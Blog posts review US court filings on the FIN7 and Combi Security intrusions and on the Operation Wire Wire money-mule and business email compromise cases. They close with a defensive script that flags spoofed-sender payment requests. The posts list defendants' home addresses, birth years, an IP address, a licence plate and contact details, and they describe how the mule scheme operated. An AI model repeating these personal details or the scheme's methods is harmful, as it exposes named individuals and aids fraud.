Sometimes the stolen information targeted not only the business accounts, but also the personal information of the victims.  One FIN7 member posted a Victim-2 employee's information to their JIRA server, showing screenshots from the employee's computer and including a text file with userids and passwords of their personal email account, LinkedIn account, and personal investment and banking accounts.

Once inside an organization, it was trivial for the FIN7 "pen-testers" to expand.  Some documents posted in JIRA included userids and passwords for more than 1,000 employees, and in the case of Victim-3, point-of-sale malware was planted on many cash register computers nationwide, including 33 locations just in the Western District of Washington.

Victim-8 had an associated JIRA "issue" posted that included screenshots and usernames and passwords for the point-of-sale software management solution used by their restaurant chain.   Hundreds of userids and passwords for employees in at least 798 different locations were also stolen from Victim-8 and posted in the JIRA server.

Kolpakov indictment
Andrey Kolpakov, aka santisimo, aka sanisimoz, aka AndreyKS, participated in the scheme from at least September 2015 until June 20, 2018.  In communications to and from Kolpakov, someone in the group referred to Fedir Hladyr and an individual still at large as the "main directors" of the group.  That other individual was also called the "chief manager" of the team.  Kolpakov was introduced to new recruits to the team as their supervisor.  Kolpakov and Dmytro Fedorov had discussions about how to trigger the phishing emails, and which file types would be most effective.  Kolpakov explained to Fedorov on 18SEP2017 that they now had a means to deploy a malware file without requiring the recipient to double-click on it.  Kolpakov's account on the JIRA server was frequently the one that uploaded stolen data in response to the "issues" created by Gladyr.  Many of the uploads mentioned in the Kolpakov indictment are about the particulars of exfiltrated files from password management systems, infrastructure management systems, and in one case an "employee only" web page that the team had altered to gather passwords.  Team members regularly communicated on the JIRA server about recommendations for attack vectors to be used against targeted infrastructure.


Dmytro Fedorov Indictment
Dmytro Fedorov's account on the JIRA server was involved in technical exploitation details.  For example, in response to an "issue" created for Victim-7, Fedorov posted the results of data created by network mapping tools, including IP addresses and network details, that helped to explain to the team what addresses should be targeted for further exploitation.

According to his indictment, Fedorov "served as a high-level pen-tester (one tasked with finding vulnerabilities that an attacker may exploit) who managed other pen-testers responsible for breaching the security of victims' computer systems."  He specifically created and managed "issues" on the FIN7 JIRA server related to intrusions of multiple companies, including Victim-7 (an automotive retail and repair chain) and Victim-9 (Sonic Drive-In).
Fedorov's communications on Jabber seem to indicate that he was controlling the data exfiltration panels associated with malware planted on victim company computers and point-of-sale terminals.  

Combi Security 

Although the current indictments only name ten victim companies, the documentation presented by the US Attorney's office makes it clear that more than 100 companies were attacked by FIN7 hackers working for Combi Security.

FIN7 Attacked at least 3600 locations of 100+ US businesses
If you wanted to have a team of the best hackers available, one option is recruiting people from the dark corners of the Internet, whose names and locations you may not know, and who may have been involved in every sort of trouble.  The other option would be to stand up a cyber security company with offices in Moscow and Haifa, Israel, and advertise for the best trained White Hat hackers to come work for your Penetration Testing (Pen-Testing) team.  FIN7 did the latter.  Using hackers who applied in their real name, showed credentials and certifications, and were in some cases formerly the employees of their respective governments, Combi Security told their hackers that they had been hired to hack various companies, and then those hackers got to work penetrating systems.

Job ads found on a Ukrainian job board indicate that Combi Security had between 21 and 80 employees.

https://jobs.dou.ua/companies/combi-security/
Google-translation of the ad:

Combi Security is one of the leading international companies in the field of information security. Its headquarters are located in Moscow and Haifa.
We are a team of leading professionals in the field of information security for various organizations working around the world. Our main specialization is a comprehensive audit of projects of any complexity, the supply of software and hardware.
Our main mission is to ensure the security of your activities, minimize the risks of using information technology. Every appeal to us for help is considered with the utmost thoroughness on an individual basis, offering an optimal solution within the framework of the tasks set and the specific needs expressed.
CombiSecurity.com offered their website in Russian, English, and Hebrew:

Their "Contacts" page listed three addresses and telephone numbers:


  • Moscow , Presnenskaya naberezhnaya, 10, block C, tel. +7 (495) 3083827
  • Haifa , 15-A Palyam St. (36 HaAtzmaut St) tel. +9 (724) 6328732
  • Odessa , ul.Uspenskaya, 65 of office 23, 65011 phone. + 38 (048) 7002409
What services did they claim to provide?  Below is their "The Services" page (Google-translated to English), retrieved from Archive.org's Wayback machine entry for CombiSecurity.com:

The services

A qualitatively working security service guarantees an indispensable stability in the operation of your technologies.
Thanks to the active assistance of our technical experts, all the irregularities in the operation of your devices will certainly be detected, analyzed and eliminated. With our professional support, the disrupted monitoring of the security system will turn into a stable process, managed in accordance with established principles and rules.
We provide services:
Penetration test (Pentest)
  • Technological penetration test.
    This penetration test is conducted to identify existing vulnerabilities in the elements of the IT infrastructure, practical demonstration of the possibility of using vulnerabilities (by the example of the most critical ones) and the formation of recommendations for the removal of identified vulnerabilities.
    A penetration test can be conducted for the perimeter of the corporate network (external test) and for internal resources (internal test). Work can be conducted with notification to administrators and users of the system under test, or without it. During internal testing, both the auditor's laptop and the customer's standard workplace can be used.
    In the testing process, both tools and manual analysis methods are used.
  • Socio-technical penetration test.
    This penetration test is conducted using social engineering techniques. The main purpose of the test is to identify the level of awareness of the Customer's personnel about the requirements for information security. In the process of testing, the response of users and personnel responsible for information security to the organizational methods of penetration used by attackers is determined.
    Methods of social engineering are often used by intruders and are directed, as a rule, to end users. As a result of a successful attack, an attacker can gain control over workstations, obtain confidential Customer documents, use the Customer's resources to organize attacks on the systems of other companies, send out spam, etc.
    The organizational aspects of information security are an important part of the protection system and, often, ordinary users are the weakest link. The given service will allow to reveal those organizational aspects of information security, on which the Customer should pay attention first of all.
    The results obtained during the provision of this service can form the basis for the development of the Security Awareness Program, which is maximally focused on the problem areas identified during the testing. This service can also be useful for checking the effectiveness of the current Customer Awareness Program.
  • Integrated penetration test.
    Complex penetration test is closest to the real actions of intruders. Using various technical and socio-engineering methods, auditors try to bypass existing protective mechanisms in order to fulfill the tasks set by the Customer (increasing privileges, gaining access to confidential information, modifying data from DBMS, etc.).
    During testing, the approaches described in the sections "Technological penetration test" and "Sociotechnical penetration test" are used, and the security of the customer's wireless networks is assessed.
The result of the work will be a report containing :
  • Methods of testing.
  • Conclusions for management, containing an overall assessment of the level of security.
  • Description of the identified deficiencies of the ISMS.
  • Description of the testing process with information on all identified vulnerabilities and the results of exploiting them.
  • Recommendations for the elimination of identified vulnerabilities.
Controlling the level of security
Due to the rapid detection of vulnerabilities and the introduction of changes to the network infrastructure, the results of a one-time verification of the level of security of the corporate network quickly lose their relevance. The need for new inspections arises after several months, and in companies with a dynamically developing IT infrastructure and a large-scale representation on the Internet, this period can be weeks or even days.
The emergence of new vulnerabilities, the change in the structure of the network perimeter, the modification of the settings of servers, network equipment and security equipment, all this requires in-depth analysis on the effect on the resistance to external unauthorized influences.
In this regard, Combi Security Company offers to your attention services aimed at constant monitoring of the state of information security. These include:

  • Monitoring the perimeter security of the corporate network
  • Designing and implementing a security management system
  • Development of corporate security policy
Evaluation of the level of security
Penetration testing is aimed at overcoming existing protective mechanisms, not at a deep assessment of the security level of a specific information system or technology. The black-box approach of a penetration test often prevents the auditor from detecting vulnerabilities that are easily found by other methods, for example by analyzing firewall settings.
The work to assess the level of security is aimed at a deep assessment of one or another aspect of information security, or a comprehensive analysis of the entire ISMS in general.
Combi Security offers the following services to assess the level of security of various aspects of information security:

  • Integrated audit of information security
  • Assessing the security of Web applications
  • Analysis of application security on mobile platforms
  • Assessing the security of wireless networks
  • Assessing the effectiveness of the information security awareness program
  • Raising user awareness
  • Preparing for audit against international standards, for example ISO 27001
  • Consultation with IT security experts
In addition to these services, there is sometimes a need to solve non-standard tasks. If you have not found a service that addresses the problem in front of you, you can contact the experts of Combi Security. Perhaps our specialists have already dealt with similar problems.
Our company offers only those services that we can really carry out with very high quality, services where we can fully utilize the rich practical experience of our specialists.

Operation Wire Wire: the South Florida Cases Part 3

In the main DOJ Operation Wire Wire press release, the South Florida cases are described like this:

  • Following an investigation by the FBI and the U.S. Secret Service, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million from proceeds of BEC scams, including eight people charged in an indictment unsealed last week in Miami. These eight defendants are alleged to have conspired to launder proceeds from numerous BEC scams, totaling at least approximately $5 million, including approximately $1.4 million from a victim corporation in Seattle, as well as various title companies and a law firm.
In Part 1 we reviewed 17-CR-20748, the case against Destiny Asjee Rowland, Lourdes Washington, and Cynthia Rodriguez. (See Operation Wire Wire: The South Florida Cases, Part 1)

In Part 2 we reviewed 18-CR-20170, the case against Eliot Pereira, Natalie Armona, Melissa Rios, Bryant Ortega, Angelo Santa Cruz, Alexis Fernandez Cruz, Roberto Carlos Gracia, Jose E. Rivera, Angeles De Jesus Angulo, Jennifer Ruiz, Yirielkys Pacheco Fernandez, and Sebastian Loayza. (See Operation Wire Wire: The South Florida Cases, Part 2)

Part 3 in our blog series focuses on those "eight people charged in an indictment unsealed last week in Miami", which refers to case 18-CR-20415, the case against Gustavo Gomez, Selene Joya, Jaremy Lucia Mena, Jose Brito Garcia, Jessica Hyde, Hillary Lee Williams, Juan Frias, and Ariel Champaign Edwards.

What links all of these cases together is that in each case, the ring leaders were recruited into their scam by the same individual: Roda Taher, who will be the focus of our next blog post "Operation Wire Wire: Who is Roda Taher?" 

The indictment begins with the statement:

"Roda Taher, aka Ressi, aka Rezi, hereinafter Taher, was the manager and supervisor of a criminal organization that engaged in money laundering by utilizing money mules and recruiters in the Southern District of Florida, in other places in the United States, and in foreign commerce."

It then introduces our cast of characters. As in South Florida case 1 and case 2, each of the players is recruited and instructed to set up a shell company, incorporate it in Florida, and establish corresponding bank accounts to receive the proceeds of various Business Email Compromise and Spear Phishing attacks, which fool company employees into wiring funds, or transferring them via ACH, into the shell company accounts.

Defendant #1: Gustavo Gomez, b.1985, incorporated AG Universal Links in Hollywood, Florida.
Defendant #2: Selene Joya, b. 1990, incorporated Joya Star Life, Inc. in Miami Gardens, Florida.
Defendant #3: Jaremy Lucia Mena, b. 1992, incorporated Jaremy International, Inc. in North Miami, Florida.
Defendant #4: Jose Brito Garcia, b. 1981, incorporated Brito Commercial Products, Inc. in Hollywood, Florida.
Defendant #5: Jessica "Chuchi" Hyde, b.1987, incorporated Hyde Quality Inc. in Cutler Bay, Florida.
Defendant #6: Hillary Lee Williams, b. 1992, incorporated H Lee W Trade Group Inc. in Miami, Florida.
Defendant #7: Juan Frias, b. 1985, incorporated Ocean Surplus, Inc. in Miami, Florida.
Defendant #8: Ariel Champaign Edwards, b. 1991, incorporated Ariel Prime Trades Inc. in Miami, Florida.

Gustavo Gomez worked closely with Roda Taher and other recruiters to recruit money mules and coach them on how to set up their bank accounts. According to the indictment:

"The recruiters would instruct money mules to open bank accounts in the name of their shell companies at various banks in the Southern District of Florida and elsewhere, and to falsely tell bank representatives that their shell company was a legitimate business engaged in the sale, import, or export of goods.  Taher and his recruiters gave different money mules a variety of false and fraudulent explanations regarding the nature of their businesses, including the sale, export, or import of textiles, furniture, electronics, or other goods.  However, the shell companies would not conduct any legitimate business."

"Once a money mule had opened a shell bank account in his or her shell company's name, those accounts would receive wire transfers of the proceeds of various fraudulent schemes.  The fraudulent schemes included, primarily, but were not limited to, email hacking or spoofing, also known as business email compromise and spearphishing scams.  Co-conspirators would hack into a victim's email account or otherwise take over that account without permission.  In a variation of this scheme, co-conspirators would "spoof" or create a fraudulent email account that was made to look like a victim's real email account.  The co-conspirators would then send email messages via the hacked or spoofed email accounts to individuals or corporations, instructing them to wire large sums of money to the money mules' shell bank accounts."

Roda Taher and the other recruiters would notify the mules when funds would be arriving into their accounts. These communications were primarily via the mobile phone encrypted messaging service WhatsApp.  They would be given instructions on what amounts would be received, where to wire the funds, and what commissions they were allowed to withdraw.  The commissions would be split with their recruiter, while the wires often sent the bulk of the money to China, Poland, and other destinations.

When banks closed the accounts, Taher would instruct the mules to open additional accounts at other banks.  Top performing mules were invited to become recruiters by inviting others to join the scheme as mules.  Recruiters received a percentage of the proceeds from the work of each mule they recruited.

The transactions particularly mentioned in the indictment are listed here. 

Count | Date | Defendant | Transaction
2 | 02 JUL 2014 | Gustavo Gomez | $48,500 from AG Universal Links' Wells Fargo Bank account to Sonish Enterprises FZE in Dubai, UAE
3 | 18 JUL 2014 | Gustavo Gomez | $192,000 from AG Universal Links' Wells Fargo Bank account to Sonish Enterprises FZE in Dubai, UAE
4 | 19 JUL 2014 | Gustavo Gomez | $4,500 from AG Universal Links' Wells Fargo Bank account to Zion Luxury Car Rental Inc.
5 | 01 AUG 2016 | Selene Joya | $8,600 from Joya Star Life Inc's Bank of America account
6 | 01 AUG 2016 | Selene Joya | $5,500 from Joya Star Life Inc's Bank of America account
7 | 01 AUG 2016 | Selene Joya | $4,000 from Joya Star Life Inc's Bank of America account
8 | 26 JAN 2017 | Jaremy Lucia Mena | $78,902 from Jaremy International Inc's TD Bank account to Bella Tyre Co Ltd in China
9 | 26 JAN 2017 | Jaremy Lucia Mena | $9,400 from Jaremy International Inc's TD Bank account
10 | 13 FEB 2017 | Jose Brito Garcia | $37,904 from Brito Commercial Products Inc's TD Bank account to Huge Elite Limited in Shanghai, China (*)
11 | 17 MAY 2017 | Hillary Lee Williams | $79,980 from H Lee W Trade Group's SunTrust Bank account to Redington Gulf FZE in Dubai, UAE
12 | 06 SEP 2017 | Juan Frias | $59,700 from Ocean Surplus Inc's TD Bank account to Zhejiang Oudi Machine Co. Ltd. in Zhejiang, China
13 | 02 NOV 2017 | Ariel Champaign Edwards | $8,200 from Ariel Prime Trade Inc's Wells Fargo account
14 | 21 NOV 2017 | Ariel Champaign Edwards | $700 from Ariel Prime Trade's Bank of America account

* - Worth noting that "Huge Elite Limited" in Shanghai, China was also the recipient of ill-gotten gains from Bryant Ortega in "Part 2."

This case is much "fresher" than some of the others. The first arraignment in the case was Gustavo Gomez's appearance on May 31, 2018. Gustavo just bonded out on June 11, 2018, for $50,000 posted by his girlfriend's brother.

Operation Wire Wire: the South Florida Cases Part 2

The Second South Florida case is linked to the first because this entire conspiracy also is part of the work of Roda Taher, AKA Ressi, AKA Rezi, the top recruiter in the first case.  However, in this 30 count indictment, the only one NOT named is Roda Taher.

Rezi recruited Eliot Pereira and Melissa Rios, below, who each in turn recruited others.


Defendant #1:  Eliot Pereira, b.1993 - opened "Eliot Products & Arts, Inc." and recruited and managed mules.
Defendant #2: Natalie Armona - opened "Armona Furniture Design Concept & Textile" and recruited and managed multiple mules and recruiters, including defendants #5, #8, #9, #10, and #12.
Defendant #3: Melissa Rios, b. 1996 - opened "Taihan Fiberoptics, Inc." and recruited #2
Defendant #4: Bryant Ortega, b. 1996 - opened "Bryant Tech Deals" and recruited and managed multiple mules, including Defendant #7. (4631 West 9th Court, Hialeah, FL 33012)
Defendant #5: Angelo Santa Cruz, b. 1994 - opened "ASC Worldwide, Inc" and recruited and managed multiple mules, including Defendants #6 & #11.
Defendant #6: Alexis Fernandez Cruz, b. 1992 - opened "Alexis Universal, Inc."
Defendant #7: Roberto Carlos Gracia, b. 1994 - opened RCG Deals, Inc.
Defendant #8: Jose E. Rivera, b. 1989 - opened Rivera Worldwide, Inc.
Defendant #9: Angeles De Jesus Angulo, b. 1996 - opened Angeles Premier Trades, Inc.
Defendant #10: Jennifer Ruiz, b. 1994 - opened Josette Quality, Inc.
Defendant #11: Yirielkys Pacheco Fernandez, b. 1984 - opened YF Nationwide, Inc.
Defendant #12: Sebastian Loayza, b. 1994 - opened Sure Trades, Inc.

This case starts off with a criminal complaint from the Miami office of the United States Secret Service.

It begins with the agent's overview of the case, which is worth quoting here:

"Federal law enforcement agents have been investigating numerous business email compromise and spear phishing scams wherein various fraudsters targeted employees with access to company finances and tricked them into making wire transfers to bank accounts thought to belong to trusted partners -- except in fact, the accounts were shell companies controlled by the fraudsters.

Different people played different roles in the scheme.  Some of the co-conspirators hacked into and took control over certain victim companies' business email accounts without the knowledge or consent of the true email account holders, or created email accounts similar to, but slightly different from, real business email accounts.  Using the sham or compromised email accounts, the fraudsters then sent emails soliciting payments, claiming that funds were owed, and representing that payments for services rendered by the victim companies should be redirected to different accounts.

Other co-conspirators, known as money mules, opened shell companies and bank accounts into which the funds were fraudulently transferred, and then withdrew the fraud proceeds in cash, or wired the fraud proceeds into their foreign and domestic bank accounts.  Several money mules progressed to recruiting and managing other mules."

Natalie Armona may have been a good choice for Melissa to recruit based on her work.  Here's a Facebook post of hers from last year!  But by the dates, she had been in the money mule business quite a while before landing this job as a Junior Processor at a lending firm.


Armona's TD Bank account 

The complaint begins by telling the story of Natalie ARMONA, who opened a business, Armona Furniture Design Concept & Textile Inc., incorporating it in Florida using her home address and opening a business checking account at TD Bank. She was the sole signatory and used her true social security number on the account. The account was opened on December 9, 2016 and received its first wire on December 14, 2016, from a scammed medical center (Victim Company A). After taking out her commission in cash ($5,500), using her true Florida driver's license number as identity confirmation, Armona wired the rest of the money to "Flame Land International Limited" in Hong Kong.

On December 21, 2016, Armona's TD Bank account received an ACH for $724,395. Armona again paid herself first, withdrawing $10,508 in person. Three wires went out: $288,301 to "Caplan Sp Zoo" in Warszawa, Poland; $194,110 to the same; and $94,218 to "Baolifeng Intl Trading Limited" in Shenzhen, China. Armona paid herself twice more, once for $5,500 and once for $9,400. On December 27, 2016, she dipped in three more times, for $800, $3,800, and $9,900.

Armona's SunTrust Bank account 

On December 9, 2016, Armona Furniture opened a SunTrust Bank account.  On December 30th she got an inbound ACH of $35,170 from a Pennsylvania sign company.  Also on December 30th, she got an incoming wire from Kukutula Development Company LLC in Koloa, Hawaii in the amount of $59,850.  On January 3, 2017, Armona withdrew $35,170.  On January 13, 2017, SunTrust closed the account for fraud with a balance of $59,850.

ASC WorldWide

A collaborating witness told the Miami Electronic Crimes Task Force that he had been recruited by Armona and had opened a shell company in the name ASC WorldWide, with accounts at TD Bank and SunTrust Bank. Among other activities, he used email-based scams to cause $80,000 to be wired.

After a few successful jobs, the suspect said that Armona told him he could earn extra money by recruiting others into the scam.  He agreed to allow the USSS to record his emails, phone calls, and any text or WhatsApp communications involving others in the scheme.

The Ortega Case 

Although Bryant is not credited with recruiting Natalie Armona, the two are Facebook friends.  Bryant's profile also suggests that he may have had access to Personal Information, as an agent at a Health Insurance organization.  His cover photo indicates he's a fan of money!


The same USSS agent who handled Armona's case also swore out the affidavit of criminal complaint against Bryant Ortega. Ortega opened a TD Bank account for his new corporation, Bryant Tech Deals, which matched his home address of 2160 NW 111 Avenue, Sunrise, Florida 33322. Bryant Tech Deals also opened a SunTrust account. Both accounts were opened on February 13, 2017, and on March 6, 2017 the SunTrust account received an inbound wire of $283,750.50. On March 7th, three withdrawals were made: $500 from an ATM, $5,600 over the counter, and $8,400, also over the counter. Ortega's true Florida driver's license was shown as proof of identity for the in-person withdrawals. Also on March 7, 2017, $94,110 was wired to "Huge Elite Limited" in Shanghai, China. After paying himself three more times the following day ($400 at an ATM, $800 at the counter, and $6,200 at the counter), another wire of $128,705 went to Huge Elite Limited. On March 9, 2017, an additional $33,000 was wired out to "Lofty Ease Limited" in Shanghai, China.
(Ortega was arrested Jan 25, 2018)

The Pereira Case 

The third case, Feb 23, 2018, has an affidavit from Miami's FBI office from an agent who previously served as a Computer Scientist in the Philadelphia office! Pereira ran several schemes against companies by impersonating their officers, including Fakhoury Law Group (Troy, Michigan), High Tech Lending (San Diego, California), Gaumer Company (Houston, Texas), Park Corporation (Cleveland, Ohio), and Zija International (Lehi, Utah). Each of those companies received fraudulent emails, claiming to be from an executive of their own company, ordering that wires be sent to accounts controlled by "OS Fly Tech Incorporated." Pereira hired an unnamed middleman to set up additional corporate accounts at Bank of America, Wells Fargo, SunTrust Bank, and Regions Bank. The middleman says that Pereira was working with an unknown male whom he called "Rezi." This would be the same person that Cynthia Rodriguez was working for, Roda Taher (see Operation Wire Wire: The South Florida Cases, Part 1). Pereira and Rezi gave one of their mules an email address, os20technologies@gmail.com, to use.


As shown above, nearly $1M in wires were sent to company accounts at Bank of America, SunTrust Bank,  TD Bank, and Wells Fargo Bank in September and October of 2016.  Pereira and his middleman communicated through WhatsApp and Email.  (954.554.5501 / bossmanweston@gmail.com / osflytechnologies@gmail.com )

The Big Picture 

Roda Taher, AKA Ressi, AKA Rezi, was the manager and supervisor of a criminal organization in the Southern District of Florida and elsewhere.  He recruited all of the defendants in this case, encouraged them to open shell accounts and receive illegally transferred funds, some of which they directly wired to China, Poland, and elsewhere.

The case involves 30 distinct financial transactions:
Count | Date | Defendant | Transaction
2 | 02 SEP 2016 | Eliot Pereira | $89,630 from OS Fly Tech's Wells Fargo account to China
3 | 30 NOV 2016 | Melissa Rios | $13,844 from Tiahan Fiberoptics Inc's TD Bank account to Huzhou Nanmei Textile
4 | 23 DEC 2016 | Natalie Armona | $288,301 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
4 | 23 DEC 2016 | Natalie Armona | $194,110 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
5 | 23 DEC 2016 | Natalie Armona | $288,301 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
6 | 23 DEC 2016 | Natalie Armona | $94,218 from Armona Furniture's TD Bank account to Baolifeng Intl. Trading Limited in Shenzhen China
7 | 12 JAN 2017 | Natalie Armona | $44,618 from Armona Furniture's TD Bank account to Hangzhou Jieenda Textile Co Ltd in China
8 | 07 MAR 2017 | Bryant Ortega | $94,110 from Bryant Tech Deal's SunTrust account to Huge Elite Limited in Shanghai, China
9 | 08 MAR 2017 | Bryant Ortega | $128,705 from Bryant Tech Deal's SunTrust account to Huge Elite Limited in Shanghai, China
10 | 08 MAR 2017 | Bryant Ortega | $6,200 from Bryant Tech Deal's SunTrust account
11 | 28 MAR 2017 | Bryant Ortega | $179,302 from Bryant Tech Deal's SunTrust account to Lofty Ease Limited in Shanghai, China
12 | 14 APR 2017 | Roberto Carlos Garcia | $3,500 from RCG Deals Inc's Bank of America account
13 | 17 APR 2017 | Roberto Carlos Garcia | $112,000 from RCG Deals Inc's Bank of America account to KT and G Corp
14 | 17 APR 2017 | Roberto Carlos Garcia | $7,000 from RCG Deals Inc's Bank of America account
15 | 17 APR 2017 | Roberto Carlos Garcia | $3,000 from RCG Deals Inc's Bank of America account
16 | 28 APR 2017 | Jennifer Ruiz | $39,841 from Josette Quality Inc's TD Bank account to Huzhou Nanmei Textile Co. Ltd.
17 | 28 APR 2017 | Jennifer Ruiz | $3,400 from Josette Quality Inc's TD Bank account
18 | 04 MAY 2017 | Roberto Carlos Garcia | $100 from RCG Deals Inc's Bank of America account
19 | 26 OCT 2017 | Angelo Santa Cruz | $88,950 from ASC Worldwide's Chase Bank account to Niche Holding Ltd.
20 | 26 OCT 2017 | Angelo Santa Cruz | $7,000 from ASC Worldwide's Chase Bank account
21 | 01 NOV 2017 | Alexis Fernandez Cruz | $8,600 from Alexis Universal Inc's TD Bank account
22 | 07 NOV 2017 | Angelo Santa Cruz | $96,500 from ASC Worldwide's TD Bank account to Zhejiang Oudi Machine Co. Ltd.
23 | 07 NOV 2017 | Angelo Santa Cruz | $8,500 from ASC Worldwide's TD Bank account
24 | 09 NOV 2017 | Alexis Fernandez Cruz | $8,500 from Alexis Universal Inc's SunTrust Bank account
25 | 21 NOV 2017 | Yirielkys Pacheco Fernandez | $34,810 from YF Nationwide Inc's Chase Bank account to Nantong Gomaa International Co. Ltd.
26 | 06 DEC 2017 | Yirielkys Pacheco Fernandez | $88,528 from YF Nationwide Inc's Chase Bank account
27 | 30 NOV 2017 | Jose E. Rivera | $54,210 from Rivera Worldwide Inc's Bank of America account to Zhejiang Senhuang Trading in Zhejiang, China
28 | 30 NOV 2017 | Jose E. Rivera | $6,100 from Rivera Worldwide Inc's Bank of America account
29 | 03 JAN 2018 | Angeles De Jesus Angulo | $79,400 from Angeles Premier Trades Inc's Wells Fargo Bank account to Farstar International Ltd
30 | 03 JAN 2018 | Angeles De Jesus Angulo | $8,600 from Angeles Premier Trades Inc's Wells Fargo Bank account

Altogether, this group is charged with laundering more than $5,000,000.

The case is scheduled to be heard in Jury Trial beginning on June 25, 2018 before Judge Marcia G. Cooke in Miami, Florida.

Tomorrow (June 13, 2018) two of the defendants are meeting to change their plea.  Jennifer Ruiz and Yirielkys Pacheco Fernandez have decided they may not want the 20 year sentence that all of them are facing as part of a conspiracy to commit money laundering at this level!

Operation Wire Wire: The South Florida Cases, Part 1

Yesterday we started a series of posts about Operation Wire Wire, where the Department of Justice announced charges against 74 people for Business Email Compromise and related scams.

The South Florida cases are so huge, we're actually going to break them into three parts as well.  In part one, we'll look at the case against Cynthia Rodriguez, Destiny Asjee Rowland, and Lourdes Washington.


Defendant #1: Cynthia Rodriguez:
18:1349.F Conspiracy to Commit Wire Fraud
18:1956-3300.F Conspiracy to Commit Money Laundering
18:1956-3300.F Money Laundering and Forfeiture Count

Defendant #2: Destiny Asjee Rowland
18:1343 Wire Fraud
18:1349 Conspiracy to Commit Wire Fraud
18:1956(h) Conspiracy to Commit Money Laundering
18:1956 Money Laundering
18:1956(a)(1)(B)(i) Money Laundering

Defendant #3: Lourdes Washington
18:1349 Conspiracy to Commit Wire Fraud
18:1956(h) Conspiracy to Commit Money Laundering
18:1956(a)(1)(B)(i) Money Laundering

According to the indictment against Destiny Asjee Rowland, Rowland incorporated "Asjee Luxury Inc" in July 2017 and claimed to be a furniture merchant wholesaler at 3688 NW 83rd Lane in Sunrise, Florida.  The victim companies in her case were a company in Eau Claire, Wisconsin, a lumber company in Illinois, and an escrow company in Roseville, California that was selling property for two people called "KW" and "TW" in the indictment.

Asjee Luxury opened accounts at TD Bank and SunTrust Bank.  Using other people's names and email addresses, she convinced companies to transfer money to her account, including by falsely claiming to be the lumber company, where she sent "urgent audit" notices to the Wisconsin company demanding immediate wire transfers of payments owed to the lumber company.  That email came from an IP address in Nigeria on July 27, 2017.  By July 28th, a Bank of America account in Wisconsin had sent $1,651,699 to her TD Bank account in Florida.

 She also caused the escrow company to redirect payments intended for their clients KW and TW to accounts she controlled, receiving $451,759 from a City National Bank account in California into her SunTrust Bank account in Florida on July 31, 2017.

Cynthia Rodriguez and Lourdes Washington have a ten-page criminal complaint written by a US Secret Service agent describing their case. Washington created a new business, LW Nationwide Inc, at 9561 Fountainebleau Blvd, Apartment 402, Miami, Florida 33172, which coincidentally is also the address on her driver's license. She then opened a Bank of America account in that name.

A real estate attorney, BD, was handling the closing on several pieces of property. On Feb 14, 2017, he received an email from ***@themarstongroup.com informing him that he would receive a check for $37,225 via registered mail, along with a 1099 tax form. The next day, an email under the same name but from ***@gmx.us said that he was leaving town unexpectedly and needed the funds sent via wire transfer instead. Those funds were then directed to the BofA account of LW Nationwide and immediately re-wired to a bank account in Zhejiang, China. The same day, Washington withdrew funds from an ATM in Hialeah, Florida. Three minutes later, at the same ATM, Cynthia Rodriguez withdrew funds from the LW Nationwide account, using the same debit card as Washington. Bank of America's logs reveal that an IP address, 50.143.68.4, was used to access the account. That IP address was Rodriguez's home Comcast Cable account at 2914 Funston Street, in Hollywood, Florida. Rodriguez made additional withdrawals from the account, including from a drive-through ATM whose cameras captured the license plate of her Nissan Quest, 520-TML, registered to Rodriguez.
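The pattern in that paragraph, a legitimate notice from the firm's own domain followed by a message under the same name from a free-mail address asking for a wire instead of a check, is exactly what a mail gateway or a finance team's payment-change procedure can check for. The script below is an added example written for this post, not code from the original or from any agency involved: it scores a constructed email thread for a sender-domain switch under a constant display name, a free-mail sender, a lookalike of a trusted partner domain (the "similar to, but slightly different from" accounts the complaints describe), and a payment-instruction change arriving from an untrusted sender. The addresses, the trusted domain example-title.com, the free-mail list and the message bodies are all constructed assumptions for the demonstration.

```python
"""Flag the sender switch and payment-instruction change pattern from the Washington case.

Added example for this post, not code from the original. Every address,
display name, domain and message body below is constructed for the demo.
"""
import re
from difflib import SequenceMatcher

# Assumed list of consumer mail providers; extend it for your environment.
FREEMAIL_DOMAINS = {"gmail.com", "gmx.us", "gmx.com", "yahoo.com", "outlook.com", "hotmail.com"}
# Phrases that typically accompany a request to change how a payment is made.
PAYMENT_CHANGE_RE = re.compile(
    r"\b(?:wire|ach|routing number|account number|new bank|instead)\b", re.IGNORECASE)

# Constructed thread modelled on the complaint: a check notice from the firm's
# real domain, then a follow-up under the same display name from free mail.
SAMPLE_THREAD = [
    {"from_name": "Jane Partner", "from_addr": "jane@example-title.com",
     "subject": "Closing proceeds",
     "body": "You will receive a check for $12,000 via registered mail with a 1099."},
    {"from_name": "Jane Partner", "from_addr": "jane.partner@gmx.us",
     "subject": "Re: Closing proceeds",
     "body": "Leaving town unexpectedly, please send the funds by wire instead."},
]


def domain_of(addr: str) -> str:
    """Lower-cased domain part of an address."""
    return addr.rsplit("@", 1)[-1].lower()


def lookalike_domain(domain, trusted_domains, threshold=0.8):
    """Return the trusted domain this one imitates, or None if exact or unrelated."""
    best, best_ratio = None, 0.0
    for t in trusted_domains:
        r = SequenceMatcher(None, domain.lower(), t.lower()).ratio()
        if r > best_ratio:
            best, best_ratio = t, r
    # An exact match (ratio 1.0) is the real domain, not a lookalike.
    return best if threshold <= best_ratio < 1.0 else None


def assess_thread(thread, trusted_domains):
    """Return per-message findings; 'payment_change_untrusted' is the one to act on."""
    trusted = {t.lower() for t in trusted_domains}
    names_seen = {}  # display name -> domain it was first seen with
    findings = []
    for i, msg in enumerate(thread):
        domain = domain_of(msg["from_addr"])
        reasons = []
        first = names_seen.setdefault(msg["from_name"], domain)
        if first != domain:
            reasons.append(f"sender_domain_switch:{first}->{domain}")
        if domain in FREEMAIL_DOMAINS:
            reasons.append("freemail_domain")
        target = lookalike_domain(domain, trusted)
        if target:
            reasons.append(f"lookalike_of:{target}")
        # Only escalate when the payment change comes from a domain we do not trust.
        if domain not in trusted and reasons and PAYMENT_CHANGE_RE.search(msg["body"]):
            reasons.append("payment_change_untrusted")
        if reasons:
            findings.append({"index": i, "from": msg["from_addr"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in assess_thread(SAMPLE_THREAD, {"example-title.com"}):
        print(f["index"], f["from"], ", ".join(f["reasons"]))
```

The display-name/domain comparison is the cheap check a gateway can do on every reply chain; the lookalike comparison catches the registered-domain variant of the same trick. Neither replaces an out-of-band call-back before any change to wiring instructions, which is the control that would have stopped the transfer in this case.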

